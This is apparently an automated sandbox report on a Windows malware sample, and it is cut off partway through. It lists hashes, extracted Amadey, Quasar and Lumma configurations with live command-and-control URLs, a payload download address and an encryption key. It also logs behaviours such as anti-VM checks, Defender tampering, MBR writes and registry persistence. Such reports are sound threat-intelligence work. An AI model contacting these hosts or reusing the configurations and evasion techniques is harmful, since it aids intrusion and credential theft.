Analysis
-
max time kernel
138s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 14:42
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
fbd874278e3584ab6be6a8c49bd7ba9d
-
SHA1
2a83fce3a5f6da55d0cb7353e5a98aaac2c7fdc2
-
SHA256
c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86
-
SHA512
d7e66c87b6e871ccfe844f051ef9a0289849602fc759ba3b251ebf891000a1db282d9a7f2d3c9c328da9ed99fc85a593fe3933aa76cd7e0e8c98394d9868d1eb
-
SSDEEP
24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:7TvC/MTQYxsWR7a0J
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://apixtreev.run/LkaUz
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://cosmosyf.top/GOsznj
https://pixtreev.run/LkaUz
https://sparkiob.digital/KeASUp
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://xcastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://7targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
Signatures
-
Amadey family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/5408-175-0x000000000C4A0000-0x000000000C5F4000-memory.dmp family_quasar behavioral2/memory/5408-177-0x000000000C5F0000-0x000000000C60A000-memory.dmp family_quasar -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 149b288636.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dd83afce66.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2f5c500416.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 80971a3226.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 20 2944 powershell.exe 47 5408 powershell.exe 107 5408 powershell.exe 142 5408 powershell.exe 269 5408 powershell.exe 355 5408 powershell.exe -
pid Process 5784 PowerShell.exe 4676 powershell.exe 224 powershell.exe 8108 powershell.exe 2944 powershell.exe 5408 powershell.exe 4860 powershell.exe 6080 powershell.exe 4340 powershell.exe 2548 powershell.exe 6656 powershell.exe 8400 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 172 2624 futors.exe 130 2624 futors.exe 138 5992 rapes.exe 156 5992 rapes.exe 254 2624 futors.exe 32 5992 rapes.exe 32 5992 rapes.exe 32 5992 rapes.exe 72 5992 rapes.exe 87 2624 futors.exe 136 5052 svchost.exe 20 2944 powershell.exe 104 2624 futors.exe 132 5992 rapes.exe 133 2624 futors.exe 113 5992 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\b296ad91.sys 07797712.exe File created C:\Windows\System32\Drivers\klupd_b296ad91a_arkmon.sys 07797712.exe File created C:\Windows\System32\Drivers\klupd_b296ad91a_klbg.sys 07797712.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 1552 takeown.exe 2440 icacls.exe 1372 takeown.exe 1252 icacls.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_mark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_mark.sys" 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b296ad91a_arkmon.sys" 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vtxCfG_1424\ImagePath = "\\??\\C:\\Windows\\Temp\\kYkKeng_1424.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b296ad91\ImagePath = "System32\\Drivers\\b296ad91.sys" 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon\ImagePath = "System32\\Drivers\\klupd_b296ad91a_arkmon.sys" 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klbg\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klbg.sys" 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klark.sys" 07797712.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 80971a3226.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 149b288636.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dd83afce66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 80971a3226.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dd83afce66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2f5c500416.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 149b288636.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2f5c500416.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 25e0e44750.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 4028 w32tm.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_13dbf360.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_13dbf360.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5ee13fa1.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5ee13fa1.cmd powershell.exe -
Executes dropped EXE 37 IoCs
pid Process 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 5992 rapes.exe 4072 Rm3cVPI.exe 2664 149b288636.exe 844 rapes.exe 220 25e0e44750.exe 2624 221.exe 5912 221.exe 4392 kO2IdCz.exe 3248 apple.exe 2928 221.exe 5968 221.exe 1564 amnew.exe 2624 futors.exe 2944 dd83afce66.exe 5776 gron12321.exe 3972 69ef18966e.exe 2104 v7942.exe 3136 2f5c500416.exe 4024 alex1dskfmdsf.exe 5036 EPTwCQd.exe 3508 80971a3226.exe 776 Bell_Setup16.exe 2816 Bell_Setup16.tmp 3712 Bell_Setup16.exe 1424 Bell_Setup16.tmp 5420 u75a1_003.exe 5572 7IIl2eE.exe 1424 tzutil.exe 4028 w32tm.exe 13252 rapes.exe 13204 bot.exe 13304 futors.exe 6604 bot.exe 7780 Rm3cVPI.exe 9176 389f4e0c.exe 10124 07797712.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 2f5c500416.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 80971a3226.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 149b288636.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine dd83afce66.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys 07797712.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys\ = "Driver" 07797712.exe -
Loads dropped DLL 27 IoCs
pid Process 1272 regsvr32.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 8072 regsvr32.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 2440 icacls.exe 1372 takeown.exe 1252 icacls.exe 1552 takeown.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" kO2IdCz.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c11cba54-f45d-4da0-9170-b7d29a6abc58 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{05153dd9-b861-4ac2-830e-07f05cd13009}\\c11cba54-f45d-4da0-9170-b7d29a6abc58.cmd\"" 07797712.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 07797712.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 07797712.exe File opened for modification \??\PHYSICALDRIVE0 149b288636.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 5992 rapes.exe 2664 149b288636.exe 844 rapes.exe 2944 dd83afce66.exe 3136 2f5c500416.exe 3508 80971a3226.exe 13252 rapes.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5776 set thread context of 1044 5776 gron12321.exe 273 PID 3972 set thread context of 5948 3972 69ef18966e.exe 276 PID 4024 set thread context of 5424 4024 alex1dskfmdsf.exe 285 PID 5036 set thread context of 4920 5036 EPTwCQd.exe 287 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 389f4e0c.exe File opened (read-only) \??\VBoxMiniRdrDN 07797712.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3144 sc.exe 4332 sc.exe 5472 sc.exe 5484 sc.exe 3216 sc.exe 2892 sc.exe 2140 sc.exe 1976 sc.exe 4860 sc.exe 5716 sc.exe 2096 sc.exe 2036 sc.exe 1244 sc.exe 1044 sc.exe 5940 sc.exe 3476 sc.exe 4588 sc.exe 4352 sc.exe 6052 sc.exe 5880 sc.exe 3476 sc.exe 5308 sc.exe 1560 sc.exe 1260 sc.exe 2364 sc.exe 3928 sc.exe 4560 sc.exe 1020 sc.exe 5032 sc.exe 4920 sc.exe 5036 sc.exe 5736 sc.exe 3104 sc.exe 5500 sc.exe 756 sc.exe 3096 sc.exe 1636 sc.exe 1596 sc.exe 4480 sc.exe 4604 sc.exe 2360 sc.exe 5716 sc.exe 3576 sc.exe 4024 sc.exe 1424 sc.exe 2896 sc.exe 2336 sc.exe 3712 sc.exe 1280 sc.exe 5824 sc.exe 4336 sc.exe 4756 sc.exe 1160 sc.exe 4576 sc.exe 5968 sc.exe 2608 sc.exe 4080 sc.exe 5344 sc.exe 4416 sc.exe 4068 sc.exe 5092 sc.exe 700 sc.exe 1192 sc.exe 1568 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh 07797712.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh 07797712.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3368 3508 WerFault.exe 288 -
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowerShell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 07797712.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd83afce66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 149b288636.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f5c500416.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 80971a3226.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened 